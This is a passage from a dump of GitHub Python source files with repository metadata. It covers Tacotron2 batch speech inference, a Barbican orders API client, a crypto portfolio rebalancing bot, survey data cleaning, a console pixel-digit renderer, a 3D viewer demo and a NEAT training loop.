np\nfrom scipy.io.wavfile import write\nimport pickle\nimport sys\nimport os\nimport math\nimport time\nfrom dllogger.logger import LOGGER\nimport dllogger.logger as dllg\nfrom dllogger.autologging import log_hardware, log_args\nfrom torch.utils.data import Dataset\n# from apex import amp\n\nfrom waveglow.denoiser import Denoiser\n\ndef parse_args(parser):\n \"\"\"\n Parse commandline arguments.\n \"\"\"\n parser.add_argument('-i', '--input', type=str, default= 'data/input/Demo.pickle',\n help='full path to the input text (phareses separated by new line)')\n parser.add_argument('-o', '--output', default= 'data/output', #'\n help='output folder to save audio (file per phrase)')\n parser.add_argument('--tacotron2', type=str, default='models/tacotron2_statedict.pt',\n help='full path to the Tacotron2 model checkpoint file')\n parser.add_argument('--waveglow', type=str,default= 'models/waveglow_256channels.pt',\n help='full path to the WaveGlow model checkpoint file')\n parser.add_argument('-s', '--sigma-infer', default=0.9, type=float)\n parser.add_argument('-d', '--denoising-strength', default=0.01, type=float)\n parser.add_argument('-sr', '--sampling-rate', default=22050, type=int,\n help='Sampling rate')\n parser.add_argument('--amp-run', default = False,\n help='inference with AMP')\n parser.add_argument('--log-file', type=str, default='nvlog.json',\n help='Filename for logging')\n parser.add_argument('--include-warmup', default= False,\n help='Include warmup')\n parser.add_argument('--stft-hop-length', type=int, default=256,\n help='STFT hop length for estimating audio length from mel size')\n\n\n return parser\n\n\ndef load_checkpoint(checkpoint_path, model_name):\n assert os.path.isfile(checkpoint_path)\n\n print(\"Loading checkpoint '{}'\".format(checkpoint_path))\n checkpoint_dict = torch.load(checkpoint_path, map_location='cpu')\n model.load_state_dict(checkpoint_dict['state_dict'])\n print(\"Loaded '{}' checkpoint '{}'\" .format(model_name, checkpoint_path))\n return model\n\n\ndef checkpoint_from_distributed(state_dict):\n \"\"\"\n Checks whether checkpoint was generated by DistributedDataParallel. DDP\n wraps model in additional \"module.\", it needs to be unwrapped for single\n GPU inference.\n :param state_dict: model's state dict\n \"\"\"\n ret = False\n for key, _ in state_dict.items():\n if key.find('module.') != -1:\n ret = True\n break\n return ret\n\n\ndef unwrap_distributed(state_dict):\n \"\"\"\n Unwraps model from DistributedDataParallel.\n DDP wraps model in additional \"module.\", it needs to be removed for single\n GPU inference.\n :param state_dict: model's state dict\n \"\"\"\n new_state_dict = {}\n for key, value in state_dict.items():\n new_key = key.replace('module.', '')\n new_state_dict[new_key] = value\n return new_state_dict\n\n\ndef load_and_setup_model(model_name, parser, checkpoint, amp_run):\n model_parser = models.parse_model_args(model_name, parser, add_help=False)\n model_args, _ = model_parser.parse_known_args()\n\n model_config = models.get_model_config(model_name, model_args)\n model = models.get_model(model_name, model_config, to_cuda=True)\n\n if checkpoint is not None:\n \n state_dict = torch.load(checkpoint)['state_dict']\n # if checkpoint_from_distributed(state_dict):\n # state_dict = unwrap_distributed(state_dict)\n\n model.load_state_dict(state_dict)\n\n if model_name == \"WaveGlow\":\n model = model.remove_weightnorm(model)\n\n model.eval()\n\n if amp_run:\n model, _ = amp.initialize(model, [], opt_level=\"O3\")\n\n return model\n\n\n# taken from tacotron2/data_function.py:TextMelCollate.__call__\ndef pad_sequences(batch):\n # Right zero-pad all one-hot text sequences to max input length\n input_lengths, ids_sorted_decreasing = torch.sort(\n torch.LongTensor([len(x) for x in batch]),\n dim=0, descending=True)\n max_input_len = input_lengths[0]\n\n text_padded = torch.LongTensor(len(batch), max_input_len)\n text_padded.zero_()\n for i in range(len(ids_sorted_decreasing)):\n text = batch[ids_sorted_decreasing[i]]\n text_padded[i, :text.size(0)] = text\n\n return text_padded, input_lengths\n\n\ndef prepare_input_sequence(texts):\n\n d = []\n for i,text in enumerate(texts):\n d.append(torch.IntTensor(\n text_to_sequence(text, ['english_cleaners'])[:]))\n\n text_padded, input_lengths = pad_sequences(d)\n if torch.cuda.is_available():\n text_padded = torch.autograd.Variable(text_padded).cuda().long()\n input_lengths = torch.autograd.Variable(input_lengths).cuda().long()\n else:\n text_padded = torch.autograd.Variable(text_padded).long()\n input_lengths = torch.autograd.Variable(input_lengths).long()\n\n return text_padded, input_lengths\n\n\nclass MeasureTime():\n def __init__(self, measurements, key):\n self.measurements = measurements\n self.key = key\n\n def __enter__(self):\n torch.cuda.synchronize()\n self.t0 = time.perf_counter()\n\n def __exit__(self, exc_type, exc_value, exc_traceback):\n torch.cuda.synchronize()\n self.measurements[self.key] = time.perf_counter() - self.t0\n\n\ndef collate_fn(batch): \n tests,keys = zip(*batch)\n input_lengths, ids_sorted_decreasing = torch.sort(\n torch.LongTensor([len(x) for x in tests]),\n \n dim=0, descending=True)\n max_input_len = input_lengths[0]\n\n text_padded = torch.LongTensor(len(tests), max_input_len)\n index = torch.LongTensor(keys)[ids_sorted_decreasing]\n text_padded.zero_()\n for i in range(len(ids_sorted_decreasing)):\n text = tests[ids_sorted_decreasing[i]]\n \n text_padded[i, :text.size(0)] = text\n \n return text_padded, input_lengths, index\n\nclass dataloader(torch.utils.data.Dataset):\n \"\"\"\n 1) loads audio,text pairs\n 2) normalizes text and converts them to sequences of one-hot vectors\n 3) computes mel-spectrograms from audio files.\n \"\"\"\n def __init__(self,args):\n with open(args.input,'rb') as f:\n total = pickle.load(f)\n self.texts = total #[:1100] \n print(\"===============================len of texts\",len(self.texts))\n self.keys = np.arange(start=0,stop=len(total),step=1)\n # with open('save_audiofiles.pickle','rb') as f1:\n # self.save_filname = pickle.laod(f1)\n \n\n \n def get_text(self, text):\n text_norm = torch.IntTensor(text_to_sequence(text, ['english_cleaners']))\n return text_norm\n\n def __getitem__(self, index):\n \n # Rindx = 0-index-1\n # return self.get_text(self.texts[Rindx]), self.keys[Rindx]\n return self.get_text(self.texts[index]), self.keys[index]\n\n def __len__(self):\n return len(self.texts)\n\n\ndef main():\n \"\"\"\n Launches text to speech (inference).\n Inference is executed on a single GPU.\n \"\"\"\n parser = argparse.ArgumentParser(\n description='PyTorch Tacotron 2 Inference')\n parser = parse_args(parser)\n args, _ = parser.parse_known_args()\n\n # LOGGER.set_model_name(\"Tacotron2_PyT\")\n # LOGGER.set_backends([\n # dllg.StdOutBackend(log_file=None,\n # logging_scope=dllg.TRAIN_ITER_SCOPE, iteration_interval=1),\n # dllg.JsonBackend(log_file=args.log_file,\n # logging_scope=dllg.TRAIN_ITER_SCOPE, iteration_interval=1)\n # ])\n # LOGGER.register_metric(\"tacotron2_items_per_sec\", metric_scope=dllg.TRAIN_ITER_SCOPE)\n # LOGGER.register_metric(\"tacotron2_latency\", metric_scope=dllg.TRAIN_ITER_SCOPE)\n # LOGGER.register_metric(\"waveglow_items_per_sec\", metric_scope=dllg.TRAIN_ITER_SCOPE)\n # LOGGER.register_metric(\"waveglow_latency\", metric_scope=dllg.TRAIN_ITER_SCOPE)\n # LOGGER.register_metric(\"latency\", metric_scope=dllg.TRAIN_ITER_SCOPE)\n\n # log_hardware()\n # log_args(args)\n\n tacotron2 = load_and_setup_model('Tacotron2', parser, args.tacotron2,\n args.amp_run)\n\n waveglow = torch.load(args.waveglow)['model']\n # waveglow = load_and_setup_model('WaveGlow', parser, args.waveglow,\n # args.amp_run)\n denoiser = Denoiser(waveglow).cuda()\n\n data_loader = torch.utils.data.DataLoader(dataloader(args), 5, shuffle=False, collate_fn = collate_fn) \n\n measurements = {}\n img_num = 0\n k = 0\n for i, data in enumerate(data_loader):\n try: \n new_num = math.ceil((i+1)/2) \n sequences_padded, input_lengths, keys = data\n if torch.cuda.is_available():\n sequences_padded = torch.autograd.Variable(sequences_padded).cuda().long()\n input_lengths = torch.autograd.Variable(input_lengths).cuda().long()\n else:\n sequences_padded = torch.autograd.Variable(sequences_padded).long()\n input_lengths = torch.autograd.Variable(input_lengths).long()\n\n\n\n with torch.no_grad(), MeasureTime(measurements, \"tacotron2_time\"):\n _, mel, _, _, mel_lengths = tacotron2.infer(sequences_padded, input_lengths)\n\n with torch.no_grad(), MeasureTime(measurements, \"waveglow_time\"):\n audios = waveglow.infer(mel, sigma=args.sigma_infer)\n audios = audios.float()\n audios = denoiser(audios, strength=args.denoising_strength).squeeze(1)\n\n\n\n\n # tacotron2_infer_perf = mel.size(0)*mel.size(2)/measurements['tacotron2_time']\n # waveglow_infer_perf = audios.size(0)*audios.size(1)/measurements['waveglow_time']\n\n # LOGGER.log(key=\"tacotron2_items_per_sec\", value=tacotron2_infer_perf)\n # LOGGER.log(key=\"tacotron2_latency\", value=measurements['tacotron2_time'])\n # LOGGER.log(key=\"waveglow_items_per_sec\", value=waveglow_infer_perf)\n # LOGGER.log(key=\"waveglow_latency\", value=measurements['waveglow_time'])\n # LOGGER.log(key=\"latency\", value=(measurements['tacotron2_time']+\n # measurements['waveglow_time']))\n\n for j, audio in enumerate(audios):\n k+=1\n key = keys[j]\n audio = audio[:mel_lengths[j]*args.stft_hop_length]\n audio = audio/torch.max(torch.abs(audio))\n # audio_path = args.output + \"/audio_\"+str(j)+'-'+str(i)+\".wav\"\n audio_dir = args.output\n audio_path = str(key) + '.wav' \n save_path = os.path.join(audio_dir,audio_path)\n write(save_path, args.sampling_rate, audio.cpu().numpy())\n\n info = 'saved the %i-th audios\\n'%(k) \n \n except:\n pass\n\n # LOGGER.iteration_stop()\n # LOGGER.finish()\n\nif __name__ == '__main__':\n main()\n","repo_name":"xinshengwang/Tacotron2_batch_inference","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":11236,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"71307212907","text":"from yandex_testing_lesson import strip_punctuation_ru\n\n\ndef good_strip_punct(line):\n text = ''.join(x for x in line if x.isalpha() or x.isspace()\n or x == '-').replace(' - ', ' ')\n return ' '.join(text.split())\n\n\nif __name__ == '__main__':\n tests = [\"Мама мыла раму. Долго! \",\n \"Кое-где кое-кто кое-что не решил...\"]\n flag = True\n try:\n for test in tests:\n assert strip_punctuation_ru(test) == good_strip_punct(test)\n except AssertionError as e:\n flag = False\n\n print('YES' if flag else 'NO')\n","repo_name":"Lem-a-k/MyTestGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24644460094","text":"from cloudcafe.cloudkeep.barbican.client import BarbicanRestClient\nfrom cloudcafe.cloudkeep.barbican.secrets.models.secret import Secret\nfrom cloudcafe.cloudkeep.barbican.orders.models.order \\\n import Order, OrderRef, OrderGroup\n\n\nclass OrdersClient(BarbicanRestClient):\n\n def __init__(self, url, api_version, token=None,\n serialize_format=None, deserialize_format=None):\n super(OrdersClient, self).__init__(\n token=token, serialize_format=serialize_format,\n deserialize_format=deserialize_format)\n self.url = url\n self.api_version = api_version\n\n def _get_base_url(self):\n return '{base}/{api_version}/orders'.format(\n base=self.url,\n api_version=self.api_version)\n\n def _get_order_url(self, order_id):\n return '{base}/{order_id}'.format(base=self._get_base_url(),\n order_id=order_id)\n\n def create_order(self, name, payload_content_type, algorithm,\n bit_length, mode, expiration, headers=None):\n \"\"\"\n POST http://.../v1/orders/{order_uuid}\n Creates an order to generate a secret\n \"\"\"\n remote_url = self._get_base_url()\n secret = Secret(name=name,\n payload_content_type=payload_content_type,\n expiration=expiration,\n algorithm=algorithm,\n bit_length=bit_length,\n mode=mode)\n req_obj = Order(secret=secret)\n\n resp = self.request('POST', remote_url, request_entity=req_obj,\n response_entity_type=OrderRef, headers=headers)\n return resp\n\n def create_order_w_payload(self, name, payload_content_type, algorithm,\n bit_length, mode, expiration, payload):\n \"\"\"\n POST http://.../v1/orders/{order_uuid}\n Creates an order to generate a secret with plain text. This is\n separate from the create_order method because it is used for\n negative testing only and is expected to fail.\n \"\"\"\n remote_url = self._get_base_url()\n secret = Secret(name=name,\n payload_content_type=payload_content_type,\n expiration=expiration,\n algorithm=algorithm,\n bit_length=bit_length,\n mode=mode,\n payload=payload)\n req_obj = Order(secret=secret)\n\n resp = self.request('POST', remote_url, request_entity=req_obj,\n response_entity_type=OrderRef)\n return resp\n\n def get_order(self, order_id=None, ref=None):\n \"\"\"\n GET http://.../v1/orders/{order_uuid}\n Retrieves an order\n \"\"\"\n remote_url = ref or self._get_order_url(order_id)\n return self.request('GET', remote_url, response_entity_type=Order)\n\n def delete_order(self, order_id):\n \"\"\"\n DELETE http://.../v1/orders/{order_uuid}\n Cancels an order\n \"\"\"\n return self.request('DELETE', self._get_order_url(order_id))\n\n def get_orders(self, limit=None, offset=None, ref=None):\n \"\"\"\n GET http://.../v1/orders?limit={limit}&offset={offset} or {ref}\n Gets a list of orders\n \"\"\"\n remote_url = ref or self._get_base_url()\n resp = self.request('GET', remote_url,\n params={'limit': limit, 'offset': offset},\n response_entity_type=OrderGroup)\n return resp\n\n def update_order(self, order_id, payload_content_type=None, data=None):\n \"\"\"\n PUT http://.../v1/orders/{order_uuid}\n Attempts to update order similar to how secrets are updated.\n \"\"\"\n remote_url = self._get_order_url(order_id)\n headers = {'Content-Type': payload_content_type}\n resp = self.request('PUT', remote_url, headers=headers,\n data=data)\n return resp\n","repo_name":"jcourtois/rpc9_cloudcafe","sub_path":"cloudcafe/cloudkeep/barbican/orders/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32234297787","text":"import ccxt\r\nimport time\r\nimport os\r\nimport sys\r\n\r\nsys.path.insert(1, '../src')\r\nimport func_get\r\nimport func_update\r\nimport func_rebalance\r\n\r\n\r\ndef run_bot(config_system, config_params_path, last_loop_path, transfer_path, open_orders_df_path, transactions_df_path, queue_df_path, profit_df_path, cash_flow_df_path):\r\n bot_name = os.path.basename(os.getcwd())\r\n exchange = func_get.get_exchange(config_system)\r\n config_params = func_get.get_json(config_params_path)\r\n \r\n end_date_flag, prev_date = func_get.check_end_date(cash_flow_df_path, transactions_df_path)\r\n\r\n if end_date_flag:\r\n func_rebalance.update_end_date_rebalance(prev_date, exchange, config_system, config_params, config_params_path, last_loop_path, transfer_path, profit_df_path, cash_flow_df_path)\r\n\r\n rebalance_flag = func_rebalance.get_rebalance_flag(exchange, config_params, last_loop_path, transfer_path, profit_df_path, cash_flow_df_path)\r\n\r\n if rebalance_flag:\r\n func_rebalance.clear_orders_rebalance(exchange, bot_name, config_system, config_params, last_loop_path, transfer_path, open_orders_df_path, transactions_df_path, queue_df_path, profit_df_path, cash_flow_df_path, resend_flag=False)\r\n \r\n for symbol in config_params['symbol']:\r\n func_rebalance.rebalance(exchange, symbol, config_params, last_loop_path, transfer_path, open_orders_df_path, profit_df_path, cash_flow_df_path)\r\n \r\n func_rebalance.update_sequence_loop(config_params, last_loop_path)\r\n\r\n cash = func_get.get_quote_currency_value(exchange, symbol)\r\n print(f\"Cash: {cash} USD\")\r\n else:\r\n func_rebalance.clear_orders_rebalance(exchange, bot_name, config_system, config_params, last_loop_path, transfer_path, open_orders_df_path, transactions_df_path, queue_df_path, profit_df_path, cash_flow_df_path, resend_flag=True)\r\n\r\n func_update.update_timestamp(last_loop_path)\r\n\r\n timestamp = func_get.get_time()\r\n print(f\"Time: {timestamp}\")\r\n\r\n last_loop = func_get.get_json(last_loop_path)\r\n print(f\"Next rebalance: {last_loop['next_rebalance_timestamp']}\")\r\n\r\n\r\nif __name__ == '__main__':\r\n config_system_path = 'config_system.json'\r\n config_params_path = 'config_params.json'\r\n last_loop_path = 'last_loop.json'\r\n transfer_path = 'transfer.json'\r\n open_orders_df_path = 'open_orders.csv'\r\n transactions_df_path = 'transactions.csv'\r\n queue_df_path = 'queue_{}.csv'\r\n profit_df_path = 'profit.csv'\r\n error_log_df_path = 'error_log.csv'\r\n cash_flow_df_path = 'cash_flow.csv'\r\n\r\n while True:\r\n config_system = func_get.get_json(config_system_path)\r\n idle_loop = config_system['idle_loop']\r\n\r\n if config_system['run_flag'] == 1:\r\n print(\"Start loop\")\r\n \r\n try:\r\n run_bot(config_system, config_params_path, last_loop_path, transfer_path, open_orders_df_path, transactions_df_path, queue_df_path, profit_df_path, cash_flow_df_path)\r\n except (ccxt.RequestTimeout, ccxt.NetworkError, ccxt.ExchangeError):\r\n func_update.append_error_log('ConnectionError', error_log_df_path)\r\n print('No connection: Skip the loop')\r\n \r\n print(\"End loop\")\r\n print(f\"Wait {idle_loop} seconds\")\r\n else:\r\n print(\"Stop process\")\r\n func_rebalance.reset_order_loop(last_loop_path)\r\n \r\n time.sleep(idle_loop)","repo_name":"neozan/puresed-bot","sub_path":"bot_rebalance/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3448,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"23429640045","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 9 15:09:24 2020\n\n@author: fs19144\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\n\ndef read_data():\n survey = pd.read_csv(\"data/survey.csv\")\n \n # Remove columns with any NaNs\n any_nans = np.repeat(False, np.shape(survey)[0])\n for i in [1, 2, 4]:\n any_nans = any_nans ^ np.isnan(survey.iloc[:,i]) \n survey = survey.loc[~any_nans, :]\n \n # Remove letters that aren't in the alphabet\n upper_letters = [chr(x) for x in range(65, 91)]\n survey.iloc[:, 3] = survey.iloc[:, 3].str.upper()\n letters_in = np.repeat(False, np.shape(survey)[0])\n for i in range(np.shape(survey)[0]):\n letters_in[i] = survey.iloc[i, 3] in upper_letters\n survey = survey.loc[letters_in, :]\n print(\"{} ({}%) people picked a letter that isn't in the alphabet\".format(sum(~letters_in), np.round(sum(~letters_in)/len(~letters_in), 4)*100 ))\n \n # Remove numbers which are decimals\n decimal_inputs = np.repeat(False, np.shape(survey)[0])\n for i in [1, 2, 4]:\n decimal_inputs = decimal_inputs ^ np.round(survey.iloc[:,i]) - survey.iloc[:,i] > 0\n survey = survey.loc[~decimal_inputs, :]\n print(\"{} ({}%) people picked at least one number as a decimal\".format(sum(decimal_inputs), np.round(sum(decimal_inputs)/len(decimal_inputs), 4)*100 ))\n\n return survey","repo_name":"dannyjameswilliams/randomchoices","sub_path":"code/data_funs.py","file_name":"data_funs.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9421984220","text":"# Ovec_lib.py\n# =================================================\n'''\nOverview\n========\n\nThe method \"number_matrix\" shows a number in a \n“Console-style” output of one char per pixel. The \nfunction takes an integer and returns eight rows of chars \nwhich represent EXACTLY three figures. When the size of the\nnumber is less than 100 it is padded with leading zeros. \nWhen the size is more than 999, it only shows the FIRST \nthree figures. Negative numbers have EXACTLY 2 figures -\nsince the first is the leading minus.\n\n== Examples ==  -7 ==> -07  72 ==> 072  5923 ==> 592\n\nAlgorithm\n=========\nThe dictionary provides 8*5-pixel patterns for the 11 chars\nit supports; these are the “minus” and digits (0 to 9).\nAllowing 2 pixels in between each char gives totals:\n\n   WIDTH: (5+2) + (5+2) +5 = 17 chars\n   HEIGHT: 8 chars\n'''\n# =================================================\n'''\n First Section - Pixel Dictionary \n ================\n + - and digits 0 to 9\n'''\n# =================================================\n\ndef dic_pixel_font():\n \n return {'1':[' 11',\n ' 1111',\n '11 11',\n ' 11',\n ' 11',\n ' 11',\n ' 11',\n ' 11'],\n \n '2':[' 222 ',\n '22 22',\n '2 22',\n ' 22',\n ' 22',\n ' 22 ',\n ' 22 ',\n '22222'],\n \n '3':[' 333 ',\n '33 33',\n '3 33',\n ' 33',\n ' 3333',\n ' 33', \n '33 33',\n ' 333 '],\n \n '4':[' 44 ',\n ' 44 ',\n '44 ',\n '44 44',\n '44 44',\n '44444',\n ' 44',\n ' 44',],\n \n '5':['55555',\n '55 ',\n '55 ',\n '55 ',\n ' 555',\n ' 5', \n ' 5',\n '5555 '],\n \n '6':[' 66',\n ' 66 ',\n '.66 ',\n '6666 ',\n '66666',\n '6 66',\n '6 66',\n '66666'],\n \n '7':['77777',\n ' 77',\n ' 7 ',\n ' 77 ',\n ' 7 ',\n ' 77 ', \n ' 7 ',\n '77 '],\n \n \n '8':[' 888 ',\n '8 8',\n '8 8',\n ' 888 ',\n ' 888 ',\n '8 8',\n '8 8', \n ' 888 '],\n \n '9':['99999',\n '9 99',\n '9 99',\n '9 99',\n ' 9999',\n ' 99 ',\n ' 99 ',\n '99 '],\n \n '0':[' 000 ',\n '00 00',\n '0 0',\n '0 0',\n '0 0',\n '0 0', \n '00 00',\n ' 000 '],\n \n '-':[' ',\n ' ',\n ' ',\n ' ',\n '#####',\n ' ',\n ' ',\n ' '], \n \n '+':[' ',\n ' ',\n ' ## ',\n ' ## ',\n '#####',\n ' ## ',\n ' ## ',\n ' '] \n \n }\n \n# =================================================\n'''\n Second Section - Pixel Matrix\n ============\n Represents the orignal number as three figures\n forming a matrix of characters 8 rows * 17 cols\n'''\n# =================================================\n \ndef each_pixel_line(row,fig_trio):\n spacer,d_xo=2*\" \",dic_pixel_font()\n return str(d_xo[fig_trio[0]][row]+spacer+ \\\n d_xo[fig_trio[1]][row]+spacer+ \\\n d_xo[fig_trio[2]][row])\n \ndef pixel_matrix(fig_trio):\n return [each_pixel_line(r,fig_trio) for r in range(8) ]\n \ndef number_matrix(number,limit_of2=False):\n return pixel_matrix(made_into3figs(number, \\\n limit_of2))\n \n\ndef reduce_suffix(numx,maintain_2=True):\n base,num=1000,abs(float(numx))\n if maintain_2 : base=100\n if numx<0: base=100\n while num>=base: num/=10\n return int(round(num))\n \n \ndef made_into3figs(numx,limit_of2):\n see_digit,prefix=2,\"+\"\n if limit_of2==False and numx>0:\n see_digit,prefix=3,\"\"\n if numx<0: prefix=\"-\"\n rhs=\"000000\"+str(reduce_suffix(numx, \\\n maintain_2=limit_of2))\n return prefix+rhs[-see_digit:]\n \n# =================================================\n'''\n Main Section - The \"public\" function\n There are three return values:\n \n picture_right is boolean: \n True - the image goes to the right of the paper\n False - the image goes to the left of the paper\n \n number_matrix produced for x display\n number_matrix produced for y display\n'''\n# =================================================\n\ndef build_labels(coords): \n xprod,yprod,_ignore=coords\n \n print(\" * * * Debug ==> Values look like\",\n int(xprod),\",\",int(yprod))\n \n signs_required = bool( xprod<0 or yprod<0 ) \n \n picture_right= bool(xprod >= 0) \n return picture_right, \\\n number_matrix(xprod,limit_of2=signs_required),\\\n number_matrix(yprod,limit_of2=signs_required) \n \n# =================================================\n'''\n Final Section - Testing when run as stand-alone\n'''\n# =================================================\ndef num_pattern_basictest(): \n \n print(\"*** Should be 258 **\")\n print(\"abcdefghij123456789\")\n number=25775\n plate=number_matrix(number)\n for pl in plate:print (pl)\n print(\"abcdefghij123456789\")\n \n print(\"*** Should be +51 **\")\n print(\"abcdefghij123456789\")\n number=512\n plate=number_matrix(number,limit_of2=True)\n for pl in plate:print (pl)\n print(\"abcdefghij123456789\")\n \n print(\"*** Should be 091 **\")\n print(\"abcdefghij123456789\")\n number=91\n plate=number_matrix(number)\n for pl in plate:print (pl)\n print(\"abcdefghij123456789\")\n \n print(\"*** Should be -03 **\")\n print(\"abcdefghij123456789\")\n number=-3\n plate=number_matrix(number)\n for pl in plate:print (pl)\n print(\"abcdefghij123456789\")\n \n# ===========================================\nif __name__ == \"__main__\":\n num_pattern_basictest()\n","repo_name":"LawrenceuSRprog/Python-Console-Triangle","sub_path":"Ovec_lib.py","file_name":"Ovec_lib.py","file_ext":"py","file_size_in_byte":6963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74182809706","text":"#!/usr/bin/python3\nimport numpy\nimport scipy.spatial\nfrom pyridescence import *\n\nviewer = guik.LightViewer.instance()\nviewer.enable_normal_buffer()\nviewer.set_screen_effect(glk.ScreenSpaceLighting())\n\nsub_viewer = viewer.sub_viewer('sub')\nsub_viewer.update_drawable('cube', glk.primitives.cube(), guik.Rainbow(scale=2.0, trans=(1.0, 0.0, 0.0)))\n\ncloud = numpy.random.randn(8192, 3)\ncloud = 5.0 * (cloud.T / numpy.linalg.norm(cloud, axis=1)).T\ncloud_buffer = glk.create_pointcloud_buffer(cloud)\nviewer.update_drawable('cloud', cloud_buffer, guik.Rainbow().add('point_scale', 2.0).make_transparent())\nviewer.update_drawable('icosahedron', glk.primitives.icosahedron(), guik.FlatColor(1.0, 0.5, 0.0, 0.5, scale=2.0))\n\ntime = 0.0\ntext = 'test'\nmodel_control = guik.ModelControl('model_control')\ndef callback():\n imgui.begin('ui', None, imgui.WindowFlags_AlwaysAutoResize)\n\n io = imgui.get_io()\n if not io.want_capture_mouse:\n if imgui.is_mouse_clicked(0):\n print('clicked')\n mouse_pos = imgui.get_mouse_pos()\n\n model_control.draw_gizmo_ui()\n model_control.draw_gizmo()\n setting, drawable = viewer.find_drawable('icosahedron')\n setting.add('model_matrix', model_control.model_matrix())\n\n global time\n imgui.separator()\n updated, time = imgui.drag_float('time', time, 0.1)\n if updated:\n viewer.append_text('time:%.3f' % time)\n setting, drawable = viewer.find_drawable('cloud')\n matrix = numpy.identity(4)\n matrix[:3, :3] = scipy.spatial.transform.Rotation.from_rotvec([0, 0, time]).as_matrix()\n setting.add('model_matrix', matrix)\n\n global text\n imgui.separator()\n _, text = imgui.input_text('text', text)\n\n imgui.separator()\n if imgui.button('close'):\n exit(0)\n\n imgui.end()\n\nviewer.register_ui_callback('callback', callback)\n\nviewer.spin()","repo_name":"koide3/iridescence","sub_path":"src/example/light_viewer.py","file_name":"light_viewer.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":156,"dataset":"github-code","pt":"37"} +{"seq_id":"23048380970","text":"from __future__ import print_function\nimport os\nimport neat\nfrom dask import visualize\nimport random\nfrom game import simulator\nimport pickle\nimport gzip\nimport copy\n\n\ndef eval_genomes(genome, config, challengers):\n\n\n genome.fitness = 0\n did_win_all = 0\n for i, c in enumerate(challengers):\n cur_simulator = simulator()\n cur_simulator.create_ai_fighters_from_gennomes([genome], config, challenger=c)\n did_cur_win = cur_simulator.run_full_simulation(c.sim_time)\n if did_cur_win:\n did_win_all += 1\n genome.fitness = genome.fitness + 100\n\n return did_win_all\n\nclass challenger(object):\n def __init__(self, genome, config, seed, sim_time):\n self.genome = genome\n self.config = config\n self.seed = seed\n self.sim_time = sim_time\n\ndef create_challenger(genome, config, sim_time):\n random.seed()\n return challenger(genome, config, random.random(), sim_time)\n\n\n\n\ndef population_run(self, fitness_function, num_genomes_per_run, n=None):\n \"\"\"\n Runs NEAT's genetic algorithm for at most n generations. If n\n is None, run until solution is found or extinction occurs.\n\n The user-provided fitness_function must take only two arguments:\n 1. The population as a list of (genome id, genome) tuples.\n 2. The current configuration object.\n\n The return value of the fitness function is ignored, but it must assign\n a Python float to the `fitness` member of each genome.\n\n The fitness function is free to maintain external state, perform\n evaluations in parallel, etc.\n\n It is assumed that fitness_function does not modify the list of genomes,\n the genomes themselves (apart from updating the fitness member),\n or the configuration object.\n \"\"\"\n\n if self.config.no_fitness_termination and (n is None):\n raise RuntimeError(\"Cannot have no generational limit with no fitness termination\")\n\n k = 0\n challengers = []\n\n while n is None or k < n:\n k += 1\n if k > 0 and (k+1) % 5 == 0:\n with open(f'challengers_{k}', 'wb+') as f:\n pickle.dump({'challengers':challengers, 'genomes':all_genomes}, f)\n self.reporters.start_generation(self.generation)\n\n # Evaluate all genomes using the user-provided function.\n all_genomes = list(self.population.values())\n if len(challengers) == 0:\n for _ in range(10):\n challengers.append(create_challenger(None, None, 3))\n challengers.append(create_challenger(copy.deepcopy(all_genomes[0]), self.config, 7))\n\n\n for g in all_genomes: g.fitness = None #reset all fitnesses\n\n random.shuffle(all_genomes)\n # assert len(all_genomes) % num_genomes_per_run == 0\n best_won = -1\n for i in range(len(all_genomes)):\n best_won = max(fitness_function(all_genomes[i], self.config, challengers), best_won)\n\n # for g in all_genomes:\n # g.fitness *= k #ensure that staying at the top is good\n fitness_scores = [x.fitness for x in all_genomes]\n print('challenger_Assessment: ', best_won, len(challengers) - 1)\n if best_won > .7*(len(challengers)-1):\n print('ADDING NEW CHALLENGER!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')\n best_score = max(fitness_scores)\n best_genomes = [x for x in all_genomes if x.fitness == best_score]\n # random.shuffle(best_genomes)\n # challengers.append(create_challenger(copy.deepcopy(best_genomes[0]), self.config, sim_time=7))\n random.shuffle(all_genomes)\n challengers.append(create_challenger(copy.deepcopy(all_genomes[0]), self.config, 7))\n\n print('fit range:: ',round(min(fitness_scores),3), '->',round(max(fitness_scores),3))\n # Gather and report statistics.\n best = None\n for g in self.population.values():\n if best is None or g.fitness > best.fitness:\n best = g\n self.reporters.post_evaluate(self.config, self.population, self.species, best)\n\n # Track the best genome ever seen.\n if self.best_genome is None or best.fitness > self.best_genome.fitness:\n self.best_genome = best\n\n if not self.config.no_fitness_termination:\n # End if the fitness threshold is reached.\n fv = self.fitness_criterion(g.fitness for g in self.population.values())\n if fv >= self.config.fitness_threshold:\n self.reporters.found_solution(self.config, self.generation, best)\n break\n\n # Create the next generation from the current generation.\n self.population = self.reproduction.reproduce(self.config, self.species,\n self.config.pop_size, self.generation)\n\n # Check for complete extinction.\n if not self.species.species:\n self.reporters.complete_extinction()\n\n # If requested by the user, create a completely new population,\n # otherwise raise an exception.\n if self.config.reset_on_extinction:\n self.population = self.reproduction.create_new(self.config.genome_type,\n self.config.genome_config,\n self.config.pop_size)\n else:\n raise CompleteExtinctionException()\n\n # Divide the new population into species.\n self.species.speciate(self.config, self.population, self.generation)\n\n self.reporters.end_generation(self.config, self.population, self.species)\n\n self.generation += 1\n\n if self.config.no_fitness_termination:\n self.reporters.found_solution(self.config, self.generation, self.best_genome)\n\n 